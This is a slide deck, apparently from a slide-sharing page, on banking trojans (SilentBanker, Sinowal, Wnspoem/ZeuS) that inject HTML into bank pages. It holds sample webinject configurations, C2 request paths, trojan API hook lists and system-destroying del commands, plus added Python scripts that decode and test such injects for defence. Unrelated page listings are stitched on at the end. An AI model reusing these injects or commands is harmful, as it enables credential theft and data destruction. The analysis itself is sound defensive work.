Common Browser Hijacking Methods




David Barroso
TERENA Meeting, León
Agenda

  • Browser Hijacking
  • Examples: SilentBanker, Sinowal, Wnspoem
  • Kill the Operating System
  • Summary

Browser Hijacking
Definition


  “Browser hijacking is the modification of a web
  browser’s settings by malicious code. The term
  ‘hijacking’ is used as the changes are performed
  without the user’s permission” (Wikipedia)
  Additionally, the malicious code can modify the
  HTML rendered in the browser in order to lure the
  user




Why are they asking for so much data?

Examples
SilentBanker

  Date: 2007
  Method: Browser Helper Object
  Technique: Real time HTML injection and HTML forwarding
  Infection: drive-by exploits
  Misc: more than 75 mutations




SilentBanker: Flow Diagram




SilentBanker: BHO Installation


[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\WINDOWS\system32\mfc42dx1.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
@="SharedObject.SharedObjectVersion.1"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]
@="SharedObject.SharedObjectVersion"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]

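As an added example (not code from the presentation), the Python script below parses a .reg export such as the fragment above and joins the Browser Helper Objects enrolment with the CLSID's InprocServer32 entry, so a responder can see which DLL Internet Explorer will load at start-up. The embedded REG_TEXT is the slide's fragment with its backslashes restored; the parser, the report format and the lookup logic are this example's own.

```python
"""Triage a Windows .reg export for Browser Helper Object (BHO) registrations.

Added example (not from the presentation): a BHO is enrolled by writing its
CLSID under Explorer\Browser Helper Objects; the DLL itself is located via
HKCR\CLSID\{clsid}\InprocServer32.  Joining the two tells a responder what
Internet Explorer will actually load.
"""
import re
from typing import Dict, List

# The slide's registry fragment, re-typed with the backslashes restored.
REG_TEXT = r"""
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\WINDOWS\system32\mfc42dx1.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
@="SharedObject.SharedObjectVersion.1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
"""

BHO_ROOT = r"hkey_local_machine\software\microsoft\windows\currentversion\explorer\browser helper objects"
CLSID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key path (lower-cased): {value name: value}} for a .reg text."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "@" if name == "@" else name.strip('"')   # "@" is the default value
        value = value.strip()
        if value.startswith('"') and value.endswith('"'):
            # Real exports double the backslashes inside strings; undo that.
            value = value[1:-1].replace("\\\\", "\\")
        keys[current][name] = value
    return keys


def find_bhos(keys: Dict[str, Dict[str, str]]) -> List[Dict[str, str]]:
    """List every BHO enrolment with the DLL and ProgID its CLSID resolves to."""
    findings = []
    for key in keys:
        if not key.startswith(BHO_ROOT + "\\"):
            continue
        m = CLSID_RE.search(key)
        if m is None:
            continue
        clsid = m.group(0)
        base = f"hkey_classes_root\\clsid\\{clsid}"
        findings.append({
            "clsid": clsid.upper(),
            "description": keys.get(base, {}).get("@", ""),
            "dll": keys.get(base + "\\inprocserver32", {}).get("@", ""),
            "progid": keys.get(base + "\\progid", {}).get("@", ""),
        })
    return findings


if __name__ == "__main__":
    for bho in find_bhos(parse_reg(REG_TEXT)):
        # A generic, Microsoft-sounding description plus an unsigned DLL in
        # system32 is the pattern the slide shows; check the file's signature
        # and hash before trusting it.
        print(f"BHO {bho['clsid']}: {bho['description']!r} -> {bho['dll']} ({bho['progid']})")
```

Run it against a real export (`reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects` plus the matching HKCR\CLSID keys) and each finding's DLL path is what to hash and check for a valid signature.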
SilentBanker: Configuration File


GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442

SilentBanker: Configuration File

The encrypted configuration file includes:
  • Additional configuration sources
  • Dropsite URL
  • Update URL
  • Data encryption key

[dfgdf]
Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
Bg2=A.B.100.103/ww6/getcfg.php

[nbmx]
Bg1=X.Y.67.30/~ipcount/ww6/data.php
Bg2=A.B.100.103/ww6/data.php

[kjew]
Bg1=X.Y.67.30/~ipcount/ww6/file.exe
Bg2=A.B.100.103/ww6/file.exe

[sdfs]
secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…

SilentBanker: Injection Configuration


GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442

  Keys:
  pok  Action
  qas  Target URL
  njd  Begin replacement token
  dfr  Number of characters in njd - 1
  xzn  End replacement token
  xzq  Number of characters in xzn - 1
  rek  HTML code injected
  req  Number of characters in rek - 1

  Actions (pok):
  insert   insert injected HTML code between tokens
  delete   delete HTML code in xzn
  replace  replace HTML code in xzn
  subreq   substitute xzn with rek
  grab     extract field in xzn

[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE
BE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206
A767167752122292431222070796E666621227661636867223E0D0A202020203C
766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331

SilentBanker: Injection Configuration


Injected HTML as stored in the configuration (ROT-13 encoded):

 <ge inyvta!"gbc">
  <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq>
  <gq jvqgu!"%+1" pynff!"ynory">Платежный пароль:<#gq>
  <gq jvqgu!")$1" pynff!"vachg">
  <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"
gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq>
  <gq jvqgu!"&)1"><oe><#gq>
  <#ge>

Decoded (ROT-13 algorithm):

<tr valign="top">
   <td width="8%"><div style="width: 40px;"><br /></div></td>
   <td width="17%" class="label">Платежный пароль:</td>
   <td width="50%" class="input">
   <input type="password" name="passwd2" value="" style="width:50%" tabindex="2">
&nbsp;&nbsp;<br/> </td>
   <td width="25%"><br></td>
   </tr>

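The two slides above (the [jhw18] entry and its ROT-13 listing) can be worked through with the following added example; it is not code from the presentation or from the malware. It parses the key=value section, verifies that dfr/xzq/req really equal the token length minus one, hex-decodes njd/xzn/rek and undoes the rotation. The letter rotation is standard ROT-13; the handful of digit and punctuation swaps in `_PAIRS` are read off the before/after pair on the slide and are an assumption, since the slide does not document that part of the alphabet. The SAMPLE_CFG is the slide's entry with rek cut to its first line of hex and req set to match (the slide truncates the rest).

```python
"""Decode SilentBanker injection-configuration tokens.

Added example, not code from the presentation or the malware.  The njd, xzn
and rek values are hex-encoded bytes; the slide shows that the HTML inside
them is letter-rotated with ROT-13 and that some digits and punctuation are
swapped as well.  The letter part is standard ROT-13; the non-letter pairs
in _PAIRS are read off the before/after listing on the slide ("!" <-> "=",
"#" <-> "/", "$" <-> "0", ...) and are an assumption, because the slide does
not document the full alphabet.  Anything outside both tables passes through
unchanged, which also leaves the cp1251 Cyrillic label untouched, as on the
slide.
"""
import codecs
from typing import Dict, List

# Non-letter swaps inferred from the slide's rotated/decoded pair (assumption).
_PAIRS = {"!": "=", "#": "/", "$": "0", "%": "1", "&": "2", "(": "4", ")": "5", "+": "7"}
_SWAP = {**_PAIRS, **{v: k for k, v in _PAIRS.items()}}

# Length fields the configuration carries for each hex token: value = bytes - 1.
_LENGTH_FIELDS = (("njd", "dfr"), ("xzn", "xzq"), ("rek", "req"))

# Constructed from the slide's [jhw18] entry; rek is cut to its first line of
# hex (23 bytes) and req set accordingly, because the slide truncates the rest.
SAMPLE_CFG = """
[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek=202020203C676520696E797674612122676263223E0D0A
req=22
"""


def parse_section(text: str) -> Dict[str, str]:
    """Read one [section] of key=value lines into a dict (section name under '_name')."""
    entry: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            entry["_name"] = line[1:-1]
        elif "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def unrotate(data: bytes, codepage: str = "cp1251") -> str:
    """Undo the letter ROT-13 and the inferred punctuation swaps, then decode text."""
    out = bytearray()
    for b in data:
        ch = chr(b)
        if b < 0x80 and ch.isalpha():
            out.append(ord(codecs.encode(ch, "rot_13")))
        elif ch in _SWAP:
            out.append(ord(_SWAP[ch]))
        else:
            out.append(b)           # untouched: other digits, Cyrillic bytes, CR/LF
    return out.decode(codepage, errors="replace")


def decode_entry(entry: Dict[str, str]) -> Dict[str, str]:
    """Return the injection entry with njd/xzn/rek turned back into readable text."""
    decoded = dict(entry)
    for hex_key, _ in _LENGTH_FIELDS:
        if hex_key in entry:
            decoded[hex_key] = unrotate(bytes.fromhex(entry[hex_key]))
    return decoded


def check_lengths(entry: Dict[str, str]) -> List[str]:
    """Report every length field that does not equal (token bytes - 1)."""
    problems = []
    for hex_key, len_key in _LENGTH_FIELDS:
        if hex_key not in entry or len_key not in entry:
            continue
        expected = len(bytes.fromhex(entry[hex_key])) - 1
        if int(entry[len_key]) != expected:
            problems.append(f"{len_key}={entry[len_key]} but {hex_key} has {expected + 1} bytes")
    return problems


if __name__ == "__main__":
    entry = parse_section(SAMPLE_CFG)
    print("length check:", check_lengths(entry) or "consistent")
    for key, value in decode_entry(entry).items():
        print(f"{key} = {value!r}")
```

The length check is worth keeping when you feed a full configuration through this: the dfr/xzq/req fields are what the malware itself uses to delimit the tokens, so an entry whose counts do not match is either truncated or mis-extracted.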
SilentBanker: Original Webpage




SilentBanker: Modified Webpage




Sinowal/Anserin/Torpig

  Date: 2005
  Method: Code Injection
  Technique: Real time HTML injection and HTML forwarding
  Infection: drive-by exploits and email
  Misc: infects the Master Boot Record (MBR) to stay stealthy




Sinowal: Injection

  Sinowal does not have a configuration file with details about all the injections
  Each time the user connects to one of the targeted sites, Sinowal asks its injection
  server for instructions

Sinowal: Injection Example

GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1

  The request: tell me the fake page path
  Key: this is the targeted brand
  EncryptedData: I want the answer encrypted

Sinowal: Injection Example

Step 3: The injection server looks for the targeted brand:

  UK   online*.lloydstsb.*         /miheld.ibc                     {www}  /uk/lloyds/lloyds.php                 2 0 4
  USA  onlineid.bankofamerica.com  /cgi-bin/sso.login.controller*  {www}  /usa/bofa_pers/sso.login.php          2 0 3
  ES   www*.bancopopular.es        /Bpemotor                       {www}  /spain/bancopopular/bancopopular.php  2 0 2

Sinowal: Injection Example
Step 4: the injection server answers

www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1

  /spain/bancopopular/bancopopular.php  this is the fake page path
  2  you need a GET of the real URL to be enabled
  0  number of visits
  5  number of injection attempts
  1  injection

Sinowal: Targeted URLs


  HTTP Forwarding (Web Injects)
  •   UK: 40
  •   DE: 47
  •   US: 65
  •   ES: 30
  •   IT: 18
  •   AT: 7
  •   TR: 44
  •   PL: 7
  •   AU: 26
  •   SK: 5
  •   NZ: 8
  •   NL: 4
  •   SG: 2

Wnspoem/PRG/ZeuS/Ntos

   Date: 2006
   Method: Code Injection
   Technique: Real time HTML injection and HTML forwarding
   Infection: drive-by exploits




                 Version 1     Version 2       Version 3       Version 4
  Directory      wnspoem       sysproc64       twain_32        lowsec
  Filename       ntos.exe      oembios.exe     twext.exe       sdra64.exe
  Stolen data    audio.dll     sysproc86.sys   local.ds        local.ds
  Configuration  video.dll     sysproc32.sys   user.ds         user.ds

Wnspoem: Famous Screenshots




Wnspoem: Flow Diagram




Wnspoem: Hooks

 Wsock32.dll (FTP/POP3 capture)
  •   Send
  •   Sendto
  •   Closesocket
 Ws2_32.dll (FTP/POP3)
  •   Send
  •   Sendto
  •   WSASend
  •   WSASendTo
  •   Closesocket
 User32.dll (Keylogger)
  •   GetMessage
  •   PeekMessage
  •   GetClipboardData
 Crypt32.dll (Certificates)
  •   PFXImportCertStore
 Wininet.dll (Capture data, inject HTML)
  •   HTTPSendRequest
  •   InternetReadFile
  •   InternetReadFileEx
  •   InternetQueryDataAvailable
  •   InternetCloseHandle
  •   HTTPQueryInfo
 Ntdll.dll (Infect processes and hide files)
  •   NtCreateThread
  •   LdrLoadDll
  •   LdrGetProcedureAddress
  •   NtQueryDirectoryFile

Wnspoem: Configuration File
Configuration files in the latest wnspoem version use RC4 with 256-bit keys

set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr>
<td class="textoHome" align="left">3. Clave de Transferencias</td>
<td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td>
<td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
data_end
data_after
data_end
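The entry above can be parsed and previewed with the following added example, which is not code from the presentation or from the malware. It reads the set_url / data_before / data_inject / data_after blocks, compiles their `*` wildcards to regular expressions and applies the entry to a constructed login form, so an analyst can reproduce the extra field a victim would see without running the sample. The flags after the URL (`GP` on the slide) are kept as a string because the slide does not explain them; the HTML form is constructed for the example and is not the bank's real page.

```python
"""Parse a Wnspoem/ZeuS-style webinject entry and preview what it does to a page.

Added example for this page; it is not code from the presentation or from the
malware.  It reads the set_url / data_before / data_inject / data_after blocks
shown on the slide, compiles their "*" wildcards to regular expressions and
applies the entry to a constructed login form.  The flags after the URL ("GP"
on the slide) are kept as a string; the slide does not explain them.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# The entry from the slide, verbatim apart from rejoining the wrapped tabindex line.
WEBINJECT_CFG = """\
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr>
<td class="textoHome" align="left">3. Clave de Transferencias</td>
<td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td>
<td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
data_end
data_after
data_end
"""

# Constructed login form standing in for the targeted page (not the real one).
SAMPLE_HTML = """\
<form method="post" action="/bog/sbi">
<table>
<tr>
<td class="textoHome" align="left">1. Usuario</td>
<td align="left"><input type="text" name="user" maxlength="20"></td>
<td width="20"></td>
</tr>
<tr>
<td class="textoHome" align="left">2. Clave de Acceso</td>
<td align="left"><input type="password" name="password" maxlength="8"></td>
<td width="20"></td>
</tr>
</table>
</form>
"""


@dataclass
class WebInject:
    url: str            # URL mask with "*" wildcards
    flags: str = ""     # e.g. "GP"; not interpreted here
    before: str = ""    # data_before: anchor text the injected code follows
    inject: str = ""    # data_inject: HTML added to the page
    after: str = ""     # data_after: optional text the injected code must precede


def glob_to_regex(mask: str) -> "re.Pattern[str]":
    """'*' matches any run of characters (newlines included); all else is literal."""
    return re.compile(".*?".join(re.escape(part) for part in mask.split("*")), re.DOTALL)


def parse_webinjects(text: str) -> List[WebInject]:
    """Split the config into WebInject records, one per set_url line."""
    entries: List[WebInject] = []
    section: Optional[str] = None
    buf: List[str] = []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            entries.append(WebInject(url=parts[1], flags=parts[2] if len(parts) > 2 else ""))
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[len("data_"):], []
        elif line == "data_end":
            if entries and section is not None:
                setattr(entries[-1], section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return entries


def matches_url(entry: WebInject, url: str) -> bool:
    return glob_to_regex(entry.url).fullmatch(url) is not None


def apply_inject(entry: WebInject, html: str) -> Optional[str]:
    """Insert entry.inject after data_before (and before data_after, if given)."""
    start = 0
    if entry.before:
        m = glob_to_regex(entry.before).search(html)
        if m is None:
            return None             # anchor not on this page: nothing would be injected
        start = m.end()
    if entry.after:
        m = glob_to_regex(entry.after).search(html, start)
        if m is None:
            return None
        start = m.start()
    return html[:start] + entry.inject + html[start:]


if __name__ == "__main__":
    inject = parse_webinjects(WEBINJECT_CFG)[0]
    print("matches login URL:", matches_url(inject, "https://www.gruposantander.es/bog/sbi?ptns=acceso"))
    print(apply_inject(inject, SAMPLE_HTML))
```

Because the anchor is matched against the page as the browser received it, a bank can use the same parser defensively: run its own login page through every data_before in a leaked configuration and see which entries still hit.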




Wnspoem: Original Webpage




Wnspoem: Modified Webpage




Wnspoem: HTTP Forwarding

 Some banks use security tokens or a second authentication step more complex than a
 password
 In this scenario, HTML injection is avoided, and the user is forwarded to a
 fake webpage, usually hosted on a compromised site

Wnspoem: HTTP Forwarding

In the configuration file:
@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.php

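The forwarding rules above, as an added example that is not code from the presentation: each rule is three lines (a `@`-prefixed URL mask, the same mask again, and the fake page the browser is sent to), `would_forward()` returns the fake page for a request matching a mask, and `flag_forwards()` runs that over constructed proxy log lines to point out a client whose banking request is immediately followed by a plain-http request elsewhere, which is how the forwarding described above looks from the network side. The config is the slide's with the wrapped `index.php` lines rejoined; the log lines, client addresses and extra host names are constructed.

```python
"""Evaluate Wnspoem HTTP-forwarding rules and spot the resulting redirects in a proxy log.

Added example for this page, not code from the presentation.  Each rule on
the slide is three lines: a "@"-prefixed URL mask, the same mask again and
the fake page the browser is sent to instead.  The proxy log, the client
addresses and www.example.net are constructed for the example.
"""
import re
from typing import Dict, List, Optional, Tuple

FORWARD_CFG = """\
@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.php
"""

# Constructed proxy log: time, client, method, URL.
PROXY_LOG = """\
10:01:02 10.0.0.7 GET https://online.barclays.co.uk/login
10:01:03 10.0.0.7 GET http://compromisedhost.com/img/commons/barclay/index.php
10:02:10 10.0.0.9 GET https://online.barclays.co.uk/login
10:02:11 10.0.0.9 GET https://online.barclays.co.uk/css/main.css
10:03:00 10.0.0.9 GET https://www.example.net/news
"""


def glob_to_regex(mask: str) -> "re.Pattern[str]":
    """'*' matches any run of characters; everything else in the mask is literal."""
    return re.compile(".*".join(re.escape(part) for part in mask.split("*")))


def parse_forwards(text: str) -> List[Tuple[str, str]]:
    """Return (url mask, fake page) pairs from the three-line rule format."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    rules: List[Tuple[str, str]] = []
    i = 0
    while i + 2 < len(lines):
        if lines[i].startswith("@") and lines[i][1:] == lines[i + 1]:
            rules.append((lines[i + 1], lines[i + 2]))
            i += 3
        else:
            i += 1                  # tolerate a stray line rather than mis-pairing
    return rules


def would_forward(url: str, rules: List[Tuple[str, str]]) -> Optional[str]:
    """Fake page the browser would be sent to for this URL, or None."""
    for mask, fake in rules:
        if glob_to_regex(mask).fullmatch(url):
            return fake
    return None


def flag_forwards(log: str, rules: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """(client, banking url, next url) where a targeted HTTPS request is followed
    at once by a plain-http request to another host."""
    last_bank: Dict[str, str] = {}   # client -> most recent targeted URL
    alerts: List[Tuple[str, str, str]] = []
    for line in log.splitlines():
        _, client, _, url = line.split()
        if would_forward(url, rules) is not None:
            last_bank[client] = url
        elif client in last_bank:
            if url.startswith("http://"):
                alerts.append((client, last_bank[client], url))
            del last_bank[client]    # only the request right after the bank page counts
    return alerts


if __name__ == "__main__":
    rules = parse_forwards(FORWARD_CFG)
    for client, bank_url, next_url in flag_forwards(PROXY_LOG, rules):
        print(f"{client}: {bank_url} was followed by {next_url}")
```

A production rule would add a time window and an allow-list of the bank's own hosts, and it only works where the proxy sees full HTTPS URLs (TLS inspection) rather than just the server name.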
Wnspoem: Fake Webpage




Wnspoem: Statistics

  Analysis and Statistics: Configuration files
  750 configuration files (usually cfg.bin) analyzed.
  Only wnspoem versions 1, 2 and 3

Wnspoem: Top 10 TLD




Wnspoem: Targeted Brands




Wnspoem: Malicious Domains




Wnspoem: Malicious IP Addresses




Kill the Operating System
Kill the Operating System

  It is getting more common that, just after stealing the credentials, the operating
  system is remotely destroyed
  This action makes the analysis more difficult, since it cannot be done remotely.
  The malicious code is not securely deleted from the system and can be
  recovered
  One optimistic result is that the machine will be reformatted with a new and
  patched operating system.

Kill the Operating System

  Nethell:
   • Deletes NTDETECT.COM and ntldr
  InfoStealer:
   • Deletes drivers\*.sys
   • Deletes some registry keys (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
  Wnspoem:
   • Deletes HKCU, HKLM\Software and HKLM\System
  Glacial Dracon:
   • del /A:S /Q /F C:\*.*
   • del /S /Q %SYSTEMROOT% %PROGRAMFILES%

Summary

 Browser Hijacking is actively used in fraud schemes
 Targeted brands are all around the world
 Currently, only Microsoft Windows users are affected (Internet Explorer and
 Firefox)
 Be suspicious if your browser is asking for too much information
 Be more suspicious if your computer stops working just after your browser
 asked for too much information ☺

Thanks
David Barroso
S21sec e-crime Director
dbarroso@s21sec.com
http://blog.s21sec.com

       lostinsecurity
Thank you very much





Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 

Common Browser Hijacking Methods

  • 1. *[ Common Browser Hijacking Methods]
    David Barroso
    TERENA Meeting, León
  • 2. Agenda
    Browser Hijacking
    Examples: SilentBanker, Sinowal, Wnspoem
    Kill the Operating System
    Summary
  • 4. Definition
    “Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia)
    Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user.
  • 5. Why are they asking for so much data?
  • 7. SilentBanker
    Date: 2007
    Method: Browser Helper Object
    Technique: Real-time HTML injection and HTML forwarding
    Infection: drive-by exploits
    Misc: more than 75 mutations
  • 9. SilentBanker: BHO Installation
    [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
    @="Microsoft Shared Library Object Version"

    [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
    @="C:\WINDOWS\system32\mfc42dx1.dll"
    "ThreadingModel"="Apartment"

    [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
    @="SharedObject.SharedObjectVersion.1"

    [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]
    @="{5F226421-415D-408D-9A09-0DCD94E25B48}"

    [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]
    @="SharedObject.SharedObjectVersion"

